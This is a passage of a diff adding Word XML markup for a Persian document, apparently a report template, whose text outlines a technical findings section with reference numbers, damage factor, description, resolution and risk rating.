+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> اطم</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>نان</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> از حل آنها است.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بخش در سطح فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مورد هدف قرار م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> گ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رد</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و با</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> تمام اطلاعات لازم برا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ت</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>م</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">فراهم </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>شود که آنها مسئله را درک کنند</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> و قادر به حل </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>آن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>باش</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">بخش </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>افته</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ها با</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> شامل موارد ز</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> باشد:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">یک </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>شماره</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> مرجع برا</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رجوع</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> آسان با تصاو</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>عامل</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> آس</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ب</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> د</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ده</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ک</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> توص</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ف</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> فن</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> از موضوع</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>بخش حل و فصل مسئله</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>رتبه ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Bahnschrift" w:hAnsi="Bahnschrift" w:cs="B Nazanin" w:hint="cs"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
